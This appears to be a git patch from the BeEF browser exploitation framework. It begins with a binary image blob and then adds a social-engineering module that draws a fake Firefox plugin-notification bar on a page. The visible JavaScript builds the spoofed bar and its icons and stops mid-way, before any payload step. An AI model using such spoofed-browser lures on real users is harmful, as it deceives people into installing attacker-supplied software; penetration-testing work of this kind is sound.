zi4{z}_~`V3#G-o7P01vv@wkUzBhs4g5AV(6VPwy|1!U0gcU`~Lvsg9Srs>CdR5U*7
z_aYJ*RM}lEuZRe`2GB3_G459%O<ckpbi`(_OHK@CQqlJr$4g!39YV*ITRsl=2pYdm
z#gbfKGa>C@!7LY6q&$E@3A20H=zf^SJ}2!JTjH&z>&hj?;xz=@Ltj|DMa@m?^|+uy
zUenQ_>J$MxR&n`k!>Gq(f<YA#5qw+21ak(5i9k2hYLe*TCf3Sn%2_fq_NGEIkp!>q
zwqG$-c{(JJ9jj%##+*mX=fnX3!?q=r$C67P_Ul)RK%mZAS#sYs^ISeUnW~$8kK-ch
z9#{oK!TdYz@J^EX^rQuGJ36!f4qU$_n&=z7P94-P2%}av+lcjA9kbyJrbD2*P{Xhp
z%N90W4f#8!64O)P&>^&>ThLsK+HxCFJPj&X@zMN3J(aJmJQ{LMxdv>EZHYC!dL?3H
zIMG@Jab{)BZ<>at_vS}=j~?%6@>?>^Ve=!c%<$SoNFuCdQY_<R63ULthnIDRl2W<E
zxP0;Fn+#)5i!bF<{YNBuK~a>U^#NT>Ke}$LYOKl}gG!P@DNNUK_g<%_GH#kUnrlmt
zfDIwuw6)yowa$`L(CkFuo99BIsW^qkv0FZLq0XJ9MV~8!BW?x*dN|_~H8Ukxe!uFI
z6N<Xhh&%_1;QNpE%&ZMNB84zc1srQc*q@2r1I41C4wCDezH{V6@UvATU_b9v5f+~a
z9~3v57QxGo?*Dy40h2ZqiitFAv5I)gX_E3)m@j!0o#`-+oZz=XYnt&FJe9fU*?o~~
zcPKR_@njrfQQ>82j}Ez$!!6-d0?bKmwi@!?DlnU>JgoeMnMofMa}42AH{|j#L6MA|
z-zWW}X{Khj8el7*s{hh~Rfg|$?z8(M&mR~Rq)}K-4Mi;Px*^D=TOXOsjBf~*@s&#O
zQX$-uaKt{NkrKy^#I7D(M1M3m=tApNngxAXid1!nPG4)<F(EOkR_Nrml)BRJjikXj
z&O$Y9Pn8Y<S0Utvco7n)trnF3g;um2oe$9Fm@?Sr-=4~Q@@y57$)+TZHbUv{AM4{|
zqh@{U3?^i?<Wq^OHdra37PIezDeKu_Agc17miNT;aQ?YQQ6SPG>y!F5=@?CT+xvS@
z-o;@~P+<!R3-5WA=}Q}V--_{NW&87%p-rZ@${v4KxP-|3r=R<-PGaBGQCs&)#&%vg
z4)6Yj*ZzACUl6=ZaFddMGvbde%eiHH)cdvN?l*^R(q8z|bH2aA-PnV}aF%9Vw5M=>
zx3;w$3H|a_`W*wup0Sw7lFZ@ir<L}S<d!kI0so;t!;&4*%O{<QMJ|RbpaG|pi{^yL
zade_Rc$zdB3vh2x7Vo-R7YSLvZ~baL#n{TT@9ynS*7LRUit3(_gx@_39<0&b;Whq!
z_iyZ9F7Fw4Y#XM(!DIFMSptlLhW_b+KDy$60i0-+eZ2UZGxJi}up6tL39KUg9m7TM
zAU<*VXWaMrF^Ki`j1n%I^Ra@5Zf<VYH-~9?fro>8!DnrXm-F9l_QMtbH->I@KJD!0
z^;GkHp%U_TfG~@E!12_FCrh_CXCVhs)>m6PAs0t^w^yIpZ}ubka{bTRmSWDVBD%L|
zYPM?@0G!N1+KmV^3kY|{<FXIdDMUZW=y#X8^7=s(P*n=}_j)BY%Z4JbiDvWU?<7z0
z<bzH@3KI->_^{$>U0l!#%(|HX=h<KH*0JB7_jg_YaaW>HJj(diew4G<`*63J;>CYq
zl|S6Ou196}+V?syW7!o6K==0Qf2@IsQV!7Wf0VTp9i`5ycQ=zIzRjh))!BRX7)|pS
z4+U!lSv#hrHDIjz;ni@4S-IP*BOr-G41VwvqhH5@uat_5uH~a)H0N{B)UC-kzrCN=
z1(ZRX)op)4^fv4L`nMI<*JLnIu+imn_t(swkJbS0eGrzw(}uij0`P?*{I3rBLoO!s
z2=m%?wIS8@YNx8n>h+(GjBj~CCT}fT1Rhni{zBEF-zlcY^N;DgVeN-H<c4Nih$9>D
zZ{+Cd7?ptEV@8x)ynMHy7q3DcVI#^~2ID|F5iSkK3M3g-zA2`KV_NZIJkGBBcF4H%
zaQO{ouH37`*Grc_A5zMP=1m9Bw*3rqFLr~DpM&EMKGp>N8CPRZ$z1*UdJlqXUl(#$
z5&%B2NyjVsf?lB7`CT3lIjR>(KyloW3i20v=!4^@$7<i13(J?()K6iFU;E>}JAln~
zjXr-&RF+xOxMO%Edau_9;9?^zp!Z?zXUA*BlMg!A*Lxvqe#<o>*E_cewsRGQ+aF6e
zr(KKKz1ucfT*5iu+d*UZz%^ziL<%i5b*TJROtuUuc$(jr{?oahaN;nCkCQQ9%Kk2t
zY(JAu!w#6ky(X36>^Bh|m1-g!Lgw<GGCxPw@26)!>+RKV#c{+{&F1+U!8YPTu83a6
z{sbb!%9w(0FPDg<0p#a`Y;jS``tAXfSpcyi89E<{Q>8>&XD>Spbt8K?@iA(Wm(?EQ
zVQgQUkN%|d*%_Yy8axDu3IAtf?3k$VWfEA_QZO(Y@X38C_Ai`<5gn@qO#4}{1mMJU
z!Y?3W&=HUU*_>7&;cK^3PjrA>EG#y)EX`11Ujh}_n{QCFcO5~x*vk7P9?u~R=w-vQ
zr%WbdB9rPgJ_e3=Rz5{IgFuRC1Zu1(m-f5EB*xQ|CLDnCdM3FQk$3|U@yFV96P!`@
z*C&=9>it34p9itt-{cwmIpm9ABJEV@*e09zA{b)eIY_m&VL#jk=o)%7DqDk0D&~s}
z1~syuaN-gSckY@{GE{gT6_djVzZX-nMSW~u=Z&<ZSlgLnLg8@)Uc316$8&WX1EBgd
zmI0?LhA6oJtn(e)C?FN)mzpe9_<~Qf`;tO-L<bQb2!E*Ei;cpFIM><;pnFJ*uLmNd
zy!E$?kh&0AI{`t&T&wT>)70{M?{f!RaA#1(`EO$Wstg4AF>6|<#v2P}f!xTt1YQ$N
zvMOlpKcIso#jgjg7-#;~`wI!tt;+;*-MW$KhJha1n?k8Epqt2YpdV*`GG4$-SQuAd
z_zsf!qwLW<HIvIae<2p1Qg^|BH>Jfyh}+&5BvT-Whz|mHd<x=0Ygce&J`Voe;yPl3
z;lU)1L~MhlBk`d95E~#3V~|qOv3u|lbCJXgi5_EhUv5PWA|I0dKO_qKKrqP*B#r4g
z*-0O{)B*qj057X#$J#pIxAI%`4P)Yn^qKy9L50@0G?uRDk+%P7y$kxt#C?Ea;i8h$
zw*~(6OTUuu6BoeQz_`lFGm}RPDk;HQk13Oii1@9DQwn8R9dFq$q0Np|2JAn;>Mje?
zp$lIuiJhqiEFadNYwA!-(b>cS42cFnf{?&4kM10383hI;&B_2Q<+s7=zxQV>wNGiK
z->^ThugF}_M(hY9z2@~)P43bUxL3F`Eq3ZTuhFy-)31?Hd3<4gqE;s)M9tSz3#5l<
z)YW$F1?~O#=$0l|idj@z2#V;0zmWP8Qg^dv_1?JaVw#^uPbt44B8vh@TfY`@yLy9T
zp$7*~nft@x{9}*5mup=k>?74`OoZ<bzcsYQUgZ`l*hWX^-*x<hR#tBm#gzaKe}CbL
zjN<6VWx02nvONR|;N|;F=9Z3f&j7Gc9uUk!Q=I7?9ux>e089c2yW*GkB>BXf0t*C_
zc9vK*&yJ147%e~j)vTI7E3Dmr(gP*lrgjE3yUr0KbcJVkgwe-4hSrs(hJ^_y(wo$X
z^Iv?5kq~xD_!Xhi9g=WLh(6(UPXJbMll}eAlw9A|U3jKo{=}q~M6c$7L!p;@UF_4{
zalyx2eizI?_unqxfV7-XO;*QIwXt?7GkS3f<R<wmkez{Mi8V7nBytl=Qg;)wN}Gr3
zqWT8s$_v?l!;bkKvZZO=!^@c(^nu!=jT!(VQaJCXTs>lyeL2uHr-A4C>R)E63n;a}
zv%h*$6Ved}nWoR73>z*U@o}lO!fR84zyGwo%G!}JANyjM7;7Rdlt64|##v>bvbatR
zra92D>F!s&@kH#-AyB++Yugnys&Q2JiHvU4*j|AtML7S|c><hKr6?Ov7~rQVW*ZR4
zHyByJw%<D2F>2dAfSk~71Y86FaYjf2jVSjUHh)PjaT@c%R|K87Fs(V-PlL)Fb*q1w
z@9QHsYH3tUc)SoC&qv{ztq{a?UoKar_XQ^z&_ThAc@fx1>UasL;!LK5Lz*dapY^Xr
zOGEfEM0?Uo!vHBRDE+Sh@N{Oxj2`WOgQnw{>SRXBHJ|A2YS+iD-3~n<#VF^s*sEHN
z$!aAVzo=L(VT1pIVJj)^_rOPLZ`X`C;{)5%p&5v9x!UM=fFb}t=K9gAodUUKgcQ??
zdom5<Tc+-uh^YK3xJmqxy`iUlqCpKiW$n3`_Te_z<K3hF?GtYzv#`us)UNoL>sEBG
zLCVY0k{#-EW?GYXu~nTuYio^k%w+V-cX`WB<5*?iK7L8^(=>FN?GhsLdVV<mpVt6$
zjYmEgrW{DLkED(EArZ!DtPtX((DHi?W|HUh+q7?Ev&FgiA7hT}-Tu*znJbqWMDX9$
z+>;bMgIx%cgWSG+@y(+O7!v3Vg3bCd{$9`_(WTuvD0LVYV@ONC^HU|1nM`S~>!iy4
zU(LtQOLH1viDh42_J0Fv9#P|NR!2;TbN8Sf^8*BJCxmR7?%Dlw5(T9yAOdx#Pjz_O
zG`7(jnVM8|hwP=|wo>T_cZT%Be8MItL9WDOavKEp3sGvfF^k@DD;^)STiC8vvIPZg
zm06oON3P3JBk&ZQ5%Lpk#aI@7Ud)x|3cO0`nb<N)53r1H5@)l&A_4>Hh^`^=5i`n}
zlXboykDdC^D!-bo;uJK5>I9LzjxM|?F2t{y5U2SA9Q?IVG`!T%)LdJK9a=tf$ES!W
z;$^92zlGVm2G1^l)vI@<cNejIbj?J`K$4d%W7f{!mGXTJ>f`1>^opNOq1>U;tT5EF
z&ifiR?AowC1V&%x3JxJ|^vuG2naz7pU2mE$@gfc>C>D`gw)F;2S4O(xzTg=u3k4oD
zx3N%WEz20l>`PJnTVOpbU|zeyi(06BV*bVYPQw-dPcP(pWv)VBiHmBp7|a#(wr|VK
zYFRBSjM}5zEHN}*+NYtmUo|t{BqnxM@>f-R3hD)q3NI}opux{r2PiA}f7?VGk9=oL
z$HiusqhDKRSJ2p}d*?Bd!z`I<@rGKBp0L-uj`uwRS{uB4I$Q(HggYX}KUHlfGUK<@
z??<>qe|Vo$9cOP6C4X7SQ67wyE9GyuVHE>KdaVac+lLLJCB&)ix_9rt%^Y$eB;9rp
zQnZ(`U(*L=N)RO1Slv8^vI_`3d`z}JjSWkLOIV)>X5~Zgek#7pl0h9&veuAmR6zgw
z)6ftQOXYM|gb>_DD^pW4Qq_sDVftng9|1r$JDDF7ST_fGdl0gU3#(v1BnZI9LHv0?
z_QG_z2Hc;~0(+^SGVNc<({Q3Uvx}yScqVLBG>d$>d%ox|-SZ5GG9xWq_{@C13T*l-
zk-}<=Lp#N=kO>4gDks*sH@<7Bpr%mGIjr|({`9f^faNDwCrv;O={KWwoV0HCCs*zM
za$A?$C#%|V2~TPZ$YAANExC<-=c(kF{B32$C`1*NV>I#SO~4S=@?-ey>qLWx^M&s%
z+P8acC>mq4X}5SI9v+qB<UvXq^Q80!u3!)>wLU1_!Gg)$9E0+{mLA=V*8*XmQZ%Z>
z+)tv-$HFO0V{krZcDaVS!&;cJItzwm$&b=?@2bjw+TN#kK6jY7AfV*e+}Mch6d{yu
znUbC7U)t~Q2Pg0&9PyjCNvU&FT>Cr|)rf{%<?`dg_cT5Zj0NxOmEyBiMaVV^AH_EY
zQ+m<TJEtaaQ;n5txaht;E%J<!2i;~)GkQ&Ofd(X1U`UE&?tqQ}Y;HMw5<SKl>7R)o
zP19EY)ks?qDovUtxPHLZ@P8z9m9MqDTjk-iL~4V+f6dOeU>T)#QbNL^+y<kY$~Xjc
zmTBKbe(E7CT*nJ)q!BisN^gyS&M8K;#Bn&Qm<iE1C)F7&`AA0N!xATJrlHZ@WMHG=
za51ntn~2wpa|HSpfK%?BAakvU+aRx}ppL^7-8NZGlzuPdb}AdBYP6>E9^n2k@2`|x
zhg0g@NV|PL9T<<wO9Dzz=d}96g(Sl#0wye9u8oFH#x%BM{u`9$N_22NW&Q5N^4p8A
zHLqa{|Lbfqf~)Sudd${+&4F@poW(@!u1eWkKa-UV$6FpLr$NR2Lgw~)kYd)8D(ci8
zD2>Z}%Op>r^C|`GQ>BoCenJoEY`*uvD)`WK15@%Ak|H`3UgIcsj}rQHW3kz-N8o$x
zXcjHiSuCV~z2QG0bu1**&;?!_U-_TrsH%PWp<UZVhpHoD`9UatZe9SbA#<?tCFW>a
zQ54;j_^i|UaN+NjdYF!Qk-93pF@q3uqL2T{jM<4>u&aD96Wtw%y;tDY3*xlcN~I?U
z)AM<u;F5@+=7aV?OD0ASc$3?hQuk<DKry}-;g<F7??4Y7j|0zqm&?V<TXLnC<<5+3
zae;f>F@D-F@^^*h<xBd${MvSM|0#DFI5d0hnS*D9@p_H^Y;^HD$l!K2kqT}#8$IzX
z|2h|EK7@05teMjy9Q9Gh&sV18{?4zYQMv}sAzI04pM)I0cv)7trjjQ8Z$j-KCMC*x
zkj)U`D70*Y47bQg_lVoyW*6>9u~`|5#y&HCo5E`?9*0feV4NrNBrij>|ICnT(WOqx
z2uzBrKEz=n)Qfxl8AlB}NM!n9U}!e)#SD@hT&wqK@R!#Yk~b}reH}TJvXrB@?>Hr^
zsd>A%`{FEygZTB<Bh7X)X+-|a2vh1_Jq-=5mWq`5`%DqR7l5B2O}EQY_sa91ly(}%
za;ar|%}YPh<EKa`Y0m##c{JuCejR>$CV>NQl`KVx1?^{CSvGj^1?YtdjM4vw^ZxX)
zA>Qa?vQ-EdFwp{bO!jzhAS~!HzDm~_ZgTFCUveYhMXX$9^|@?Vc#EhpA3Pc#3Q-`F
zC`f=n$&}x$(_)G5M+}$B<4oU)_}9*e_z#Y{m|bWN$|YavFr-O09bcdoW*759FU=Ea
zV;bj+pE@{D!{~M0-$8yqPU7Zfcq004n=>TfJfknHXXw4;<Re35H5>gv<~E?uQft4;
zb%kPgv|Cbm=_4Mt!NM&WE<guOoPO69CNrQIDD*UThqpFDqs|!t?~Frg*8`}c#8}ga
zr$c>+i0!~(q|Gf!?HK-6?)Yd_JS6AQ#X?w#`6nlN+)G3{;15CwX5ulLDs1?atL@fr
z=dHQ_q+}0hG8=)cme~JS-YE05*PcU$)uHlvhFDHMTZXt(2#|aZ)nwKhx_O7icbuNf
zg^cBiafum+BO={&dKi!16UC~%h*IJ8z#p`zA^<OSYQ2EtB{$j0ev7SQv)`XA!Da<+
zv8^6LH?Sn$OO16lrF(SFaF1vdCDKzt++?g5<RH2jMD0X?${(uo${rxcuu8vY9b|Mr
zQ1c4mUd7=p$wH)C>r5EGJ{fQf=eEN#fF*m{B_cGK2fR|c7eEbV@~cjRkFRdDm=inR
z*#uM@G4QTKeFAE{i0^uPWZd848Er42aN`iYGNt6x<9e*;tGaqE(@g(tvsrhyGB9sz
z%NQIiFKev;_UcVX6`MjBE6pv#oj$*9;5&2*375U+(?E47gn|bcV&MY|sP3l-(T|e?
zM)`F$vt--HIj!CdPj{FcnJsADT3>3X&ixC&x%f}EKOEp^Xqs{D70|jYt+4#v#3@g{
zs@S{T<}k?b*_?vjq<I31-eU8s0@>xc<}7B{cVRt}yC4<Ap4H<(L^`3=tV7Wno>cBq
zpnn#S09#Za|LW^R$^Q2{Jm-WyW#X$+W+&Qx^t0>f$7Sr2_Tz;xF(RU_6=tcB->upr
zQhRj0S(!IOvyBcDsQ6@k;;@CDg|`s!T`_Uo_8(`gP~fuSdv`IbXR-oRFTeNh(E0RL
zZz){OIC4Kt5qy>><`N_;v@eju*P`*MT$-;=;NPOn<F~YYfi2~lUPkDCmpZ_n_;`_{
z*VFO{H2H-3R~ehY%TMUzT2#f;Mx!S5F`^QaJ664Fs#<8%jU9~gj(ldzt?FB>U+uX#
zB&6xM)rd1J_9Fha{+=GTANzn4GqAbETOmO1C7GB*eSTH=%*P(Ej>(q;uG#66zb~?N
zdHnmd6@er^(s}wQZYNdT$iBfG7fzqK<|l~w|EXmV3^7j2_vWc>9hhpQ+1a^t5v?vq
zB-NVw(dKlRhkzW6G&t{7@Z^%gew|U9^-ZGk*T3d!vOYFpRN|0;iK-M8o0JH=4RrX$
z?e+bHriO`%y;V)OSlOcaLc6m3-ks&Eh*uk%9=;$)Rznlrn~{^E6c_m{ac=sNR|et@
zu0z3+JkC%pfr^Z=J^ihwkH=RFc|^a}f?j)Vf(n>48Bvwy7BBf7Pa+}OA)^V?#r3Y%
zX4SzVMK$YgaAzGe)P}`Jt2-nT`IBQ$*6Sb)-mg|mh9Hze$;7yF_BEh}=^grHr_b|K
zBp_vT|0&@nNu1CJ{b@0o3?tSpbxVyO>$jv-{Ki}O*;Nh2XUQBzU{Hh`9;9XSk+_1n
zro}&-Ej4~Ub;uWhY*-wEBwbKS^NYHJygy_`CFuaqwT&%g<$FPuRmxlX6&jWm4_0VG
zhbbPbQi9D89vz=q=uD$`W>XEHoIV;izs%PbX06Xw;h7U!U{ve_Eo|?wj&l)1p6K{K
z>&Ml{K0LP00xag?2V`Uv);Z?Xm_-<Sa#%J5lDN0L3SFEIiXFxDlyyKb`rOYh__=qz
zzt*I4QkWeO6o%W3ZHcMPAY2gy4BJ;}+xAQKp7|Yp*|_&J%2Zkv@Z^4y!>JkltIC!A
zW0~R@W~UmD1Ge^zt9uHGlmC1Io;<J$5e?yAT7&%kauX&M;oo%0mnRu(g`;`<4GHpj
z(dR|xO{xrgE=azxfPwh;-wT%daNPND{>j%rt)2lB1Y!;1|M0$k{XG~Y*4bsIlO*ro
zG1QYZ+w$Az7xw*pAAO$Foji(TD_c&QhML!dB1>Ax(}|R2yOdEhET<@p5U^7d{PGgp
zF)#V51cef;@>&2)SnB4;kr)5=e)47qcD&nR_{!!A-M6`!YWSS;ui@K~AJ<nsr<M6$
zQXb%Wk@Z1*4+xfDlQw~$P<h|*h8UC$EjU@y7+iFl(oAgjt#7q41C@<&@#|n_#>e?%
ztZ0_R69KY=OIvN>8<b)tOW#(8z-RRs?bXJ0=~qN++3b(s#r8y@K`7E%ctFsATofs5
zAGIc-94U2u&#OBLjC0MT8c~*#AEfBU4Y^nF)?p?aK1e`!wF!lkk)8y1tHfEZzljWH
z1G2G2ew#nPiCx-1Kl<`FOF(CT#n<X)c=EPdb)YMq+kYwYtfwCGa^gL^Jz|WTkD($l
zX?o{3u}LURypt{X1$FtYkw!Gc$7~~$0<tcq2jd!Rejt!@<XA7E`-RqN8a;6FwabF*
z>(aVhcPu3GfoOUs<G>E<7k8=*yxUoM&-_Z4f&Xa_&7PV?Hbk1WB0As3b~LUEA#c*u
zPrbc50|Lh;wK5eHSmU<@qVXdNFRk_?Z*`CuGI`t~7=bi;uv7!hR&r)dGM=o=Q;ozz
zV`dsv<iC-XbpNXZfSDwPlwqdvK8+m``&_kEs>{cBFeus&r`#@r<OJM2)7KmBFj@=F
zpeuCH88#ZHk6dNdVmmdg<|FV<{J(^1wcThqo-lu9E%J}P=Ln<AXO2lsl>cKuPLq0c
zR^lwNRO3cMZ!9@7T_QUTD^hnMR!I?0=!KTNf{VQMH(aQ<-ON5#-T4GiLMR(@4ag6q
zS-!kiRj%KJKkym&QcOs7i{m-<X!FHtKB+&m%(#p(?(m6<HSFgpRU#?3`ruz=>6}!5
z4Z;F4Ty+i-HHBAdZ34e97%<HVIM$n%k$&JX(J`!+w}OHB1ab&FiEzu;ExrCjmMhX|
zUW2j>2-M3!GYn$h^rEj#hZF&SN$yaX3UCD(J28x=fxy`+QL)o<G7pV3&H5AE@2nXi
z?Dxl%Uz32+e0;5RuSZTCI8*${y~dxJ3Q0=QouqS5aOr}SM876-YeaT~MzO4{HL56U
z5gWd#OzFh8RRJ>tP_o&6<5-4$0`(%omD^qGYXk)GvIvxpxiOG~dnhC2R(vdgO4CzZ
z%riaE@@vGbEJ8kOY6#ZMeJ_GKd2#TcewQ1SrZrHhdt-WGn0)!l8Q2zlPs#9Lg%KN(
zx?8biJw^a%&tI7JZgSu2lJKCZAUic=qSGknz-#Am4^{~XKWO1`_?694sFojDNO)*c
z{bOlaKhA-m!tjN{p=29yr)GbxRAMGb%!zl(^2r=YBo_4{U#}ljc9*c;b%ttEz<=*W
z3Oa`%tOU|F3cCHFP={(sKW<J0k3S(d<tj7I3JW70vq`&?mJR>6z*ckPn@lU3>W?=5
z;(D5rG_8A&DJYqiv06gC#8y!fM*|J0%u_2#9^R%lxId_L53Aow4K0uK<lW@=X2em`
zMK2KCMSA=MCU^!nb^`~QU05}N<IS%n0xs;OtuIhxOwAHp11C!5w97s|&Q={a9$&TP
ziUlGNNE)(J7&w#kPCwL(K9vbb(p6fvWKVfGlgM2~Wm7ORJ&`YZ&#d1F@>+mgx}Y)k
zf`>aj9Rh{2UP3_YU_^BOJIMnU53<UDZV1Ev|3o19)ln5nNKA4`^hh^E_pbu3ye0gp
z{2-|Z((5GWF@Ck*EB-w8G=){Uzg#MuYP;rJHyDA6Z!j14Bp?RA!r!i7;kOrLa2|dW
zRFJ6@o#clNVoJK2hqbwPx%f>!iokVM6W)K7qd!OKh8c!H@{JP{h@1tAfu3hY#aAv~
zcGf&r!m1T|4&b)!lkgI=Oj1Ij-}}1gps$t?{u|H?)`4Pgkxm}+AlP%>#3B(@T}jV4
zbYik$4n_=J4jUL7>DdO0+Bmbq&=Z208^dovN}~hXZ4bjK{`_bXxi%MwlRupsOyb*X
zKN=<EM=PtUWDtz((5oR0S}E1<?UjE%yN>3O9=IY7G8deVxpI<H4MS;>o7DtERQL*n
zo&H^nl1kw|rN%(w6mQO@IuBwrMLOs(90Xh|c)k27nYe{pfKTUscH2P!1<hm3Ou}${
zab@a`c7HL~Ghfg{BBd9gVBB&H7=<O2i~d)3>yKks`#Vgl;nYHs63Zrk@heH^r^jdV
zAD^Co*3D+IZu(CCw?d+f6W8%0`x(6}okVr&y2qdvhDi3s3QeP#A8Hw8loTHuY<9;y
zW`glds934e#uqe5OluTy42<7sTJVCE1G$4EAj;%_TYl%hA)&O}qb|_3eDJzbNUd}J
zOC6iz!nyVzDReolC;={>BoPHn>B#_*e4ar(?HAgQc_Y0jJXb0+FbUMjTMo7$tUdrl
z2X%&6c#lZ-$Fge5H6Yl592i=urN9S6;Dx-o)^Z!U17+^vr@0fax<wz?8%q9;JSpTd
zD2Yl)@GVNyh>B(DVd4sh83*W$%#QQ$^4}7M6_v3Na(iuZX^E}X<$|&-x6$%xW90HZ
zYn{Ha9aBFFd8|$W^$0l+(F9P37Zta4-l`pX|I<C@?v?SoXyq;@Aqq%fgboS(Rq;lW
zwYM@3xiFaH3+<_xGfA5}Sy$B9p>~iYy=@Xv4!sEhkBl<i9Ms<Y3T)(2LJij@;HN!V
zXWW0?hQ^kVi`!mWo#t(LB{hqAynNXI6q{d|-9r<lZ`=O@B*5X99%p|S0nDrM_qj#b
zqP+8L<Ty07yA5E*!hw%=(jS<;Vrq;vgurG>e4icWGs|ViJ_PGb*UA*EnM|j#F}|Fw
zwu}f|@C+o>&O6UK_8yg73O!6aKl)i<Edvn6vuo!mkgGIbpZ;*KVqK>0)oXLzdQDLD
zDZ|#el^32jEq);_=J8tfpcnFF-E!7TdVp{;L>l!mV08l{WQo~=j>k)L12i_f^7c%v
zmft~?z#iaTk?0VDEKiV%DP&@}(ksn3k9pllr-owl(MZpuUE0lIqpHkUdhV7;a(V1r
zEmmb6EP5w0x{Vaq3jZM+T>v`ACK>;q4pxpF5nn`<!o)!wHqG}x5$*o*C;Tn&om71i
UxzG9lLE{TRKhjpIR<^<YKb4HjssI20

literal 0
HcmV?d00001


From b16d7e3563443678149bdaf91bca9d78c5815909 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 4 Jul 2013 23:12:01 +0930
Subject: [PATCH 346/397] Add fake_notification_ff module

Rename fake_notification module to fake_notification_ie
---
 .../fake_notification_ff/command.js           |  36 ++++++++++++++++++
 .../fake_notification_ff/config.yaml          |  15 ++++++++
 .../fake_notification_ff/img/install.png      | Bin 0 -> 2092 bytes
 .../fake_notification_ff/img/jigsaw.png       | Bin 0 -> 802 bytes
 .../fake_notification_ff/img/plugins.png      | Bin 0 -> 13781 bytes
 .../fake_notification_ff/module.rb            |  32 ++++++++++++++++
 .../command.js                                |   0
 .../config.yaml                               |   6 +--
 .../module.rb                                 |   4 +-
 9 files changed, 88 insertions(+), 5 deletions(-)
 create mode 100644 modules/social_engineering/fake_notification_ff/command.js
 create mode 100644 modules/social_engineering/fake_notification_ff/config.yaml
 create mode 100644 modules/social_engineering/fake_notification_ff/img/install.png
 create mode 100644 modules/social_engineering/fake_notification_ff/img/jigsaw.png
 create mode 100644 modules/social_engineering/fake_notification_ff/img/plugins.png
 create mode 100644 modules/social_engineering/fake_notification_ff/module.rb
 rename modules/social_engineering/{fake_notification => fake_notification_ie}/command.js (100%)
 rename modules/social_engineering/{fake_notification => fake_notification_ie}/config.yaml (64%)
 rename modules/social_engineering/{fake_notification => fake_notification_ie}/module.rb (86%)

diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js
new file mode 100644
index 000000000..5bb0b7744
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/command.js
@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var id = beef.dom.generateID();
+	var pid = beef.dom.generateID();
+	var zztop = beef.dom.getHighestZindex()+1;
+	var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+	var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAWCAIAAACkFJBSAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAK3SURBVDhPpZD7T1JhHMbPn1NbrdvKmpmtieJdyBuCXA/e8IJRDtOJiEpkNUzEG6QCivWDrlroxDnNbtqWzqwxMZU0jyDayi6uA1vfRF/PUn9i++zsOS/P8+EFzL/xKHgw/8bDw/CtH/rRfxPMD9UD6CEcrY+t8vEh9eay+ZDO3hAs1v38Isy6O1nnQ47Hx4RODGsO7FAPwdK9ny13d0dLKSOJXiDhLs6YDuxQDzG/twsx+Vxj7ysfsylf9Kssxoq8HN6t6uLJsXtvh2vh8PWg6pvLSO2jjPm8lh3WLMqbvNMnjwJnzxyjR4ZzOSlXGdF02oVLoSdPnTjCSLjsfHd/r4+GXgtYzAHINXNVRV58bAQjkZ7MjGWzmLiQnclOhteEOBogyWG73jejPjVgvjVTANLTqVZJYZmbzReLODlZPAjwDCASZMik+OK0fmFK65ltgjIaQgBLB+JZn66nq2looOf6tVwkAlfAy2Uz61RCLuuKQp5KOHTUIVjaET+I3p/uJ+R6r9WshUsFrhMgW8xlpSVFR4WHh52LooXOvNJQh5jP04542a94M6hcnqmvqykQ8NLh+7PwTNiDBQJc0G7r1KjLGuur3E4DdQgWYwDSbczFk+LoIRI8hpkYKeSny0sKbsgkYhEbFPCsKCv84jBtrg5uErZ/f8ruEAJGegw7uA0qRX4ULSwy4mJaSry+oXbBYf84ZVNXl+LCDLAU5fPnp7Sk58E2u6vtgJHuNoTJUMnlJAt4abDp7a78vdK26tDfrpGKBCwQCfmpjok6ah9lsLQiRge0JbI8+P3FRWLdXal3TjduV/I4DGkhriiXqavlrukGah9ljFxtQXxfti7NDS/NjXx2jhCfnm6tGL+6umY/jLico8T8kGexf4top/ZRBktz8IBFHzwYSTQGD/aHaAwesDQEz1/qC1RvBXP1zgAAAABJRU5ErkJggg==);'});
+	var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAYAAADED76LAAAEJGlDQ1BJQ0MgUHJvZmlsZQAAOBGFVd9v21QUPolvUqQWPyBYR4eKxa9VU1u5GxqtxgZJk6XtShal6dgqJOQ6N4mpGwfb6baqT3uBNwb8AUDZAw9IPCENBmJ72fbAtElThyqqSUh76MQPISbtBVXhu3ZiJ1PEXPX6yznfOec7517bRD1fabWaGVWIlquunc8klZOnFpSeTYrSs9RLA9Sr6U4tkcvNEi7BFffO6+EdigjL7ZHu/k72I796i9zRiSJPwG4VHX0Z+AxRzNRrtksUvwf7+Gm3BtzzHPDTNgQCqwKXfZwSeNHHJz1OIT8JjtAq6xWtCLwGPLzYZi+3YV8DGMiT4VVuG7oiZpGzrZJhcs/hL49xtzH/Dy6bdfTsXYNY+5yluWO4D4neK/ZUvok/17X0HPBLsF+vuUlhfwX4j/rSfAJ4H1H0qZJ9dN7nR19frRTeBt4Fe9FwpwtN+2p1MXscGLHR9SXrmMgjONd1ZxKzpBeA71b4tNhj6JGoyFNp4GHgwUp9qplfmnFW5oTdy7NamcwCI49kv6fN5IAHgD+0rbyoBc3SOjczohbyS1drbq6pQdqumllRC/0ymTtej8gpbbuVwpQfyw66dqEZyxZKxtHpJn+tZnpnEdrYBbueF9qQn93S7HQGGHnYP7w6L+YGHNtd1FJitqPAR+hERCNOFi1i1alKO6RQnjKUxL1GNjwlMsiEhcPLYTEiT9ISbN15OY/jx4SMshe9LaJRpTvHr3C/ybFYP1PZAfwfYrPsMBtnE6SwN9ib7AhLwTrBDgUKcm06FSrTfSj187xPdVQWOk5Q8vxAfSiIUc7Z7xr6zY/+hpqwSyv0I0/QMTRb7RMgBxNodTfS